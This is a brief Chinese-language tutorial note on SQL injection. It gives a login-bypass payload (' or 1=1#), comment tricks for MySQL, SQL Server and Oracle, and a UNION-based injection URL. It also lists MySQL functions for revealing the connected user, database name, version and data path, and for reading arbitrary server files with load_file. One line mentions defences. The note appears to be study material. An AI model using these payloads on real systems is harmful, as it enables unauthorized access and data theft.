一、简易登录
MYSQL数据库:
采用用户名’ or 1=1#密码随意,单引号不行就换双引号,攻击原理是利用#号把语句后面的内容注释掉
--,2个横线是SQL SERVER和Oracle数据库的单行注释
一般防御措施,SQL SERVER采用存储过程,或者参数化查询即可
MYSQL必须对用户的输入进行转义
二、使用union 爆数据库的内容
ccc.com?id=0 union select user(),2,3
黄色底纹的为mysql内置函数
User() 显示当前数据库连接的用户
database() 显示当前数据库名称
version() 显示当前数据库版本
@@datadir 显示当前数据库保存的物理路径
load_file(‘c:\\a.txt’) 读取当前服务器任意文件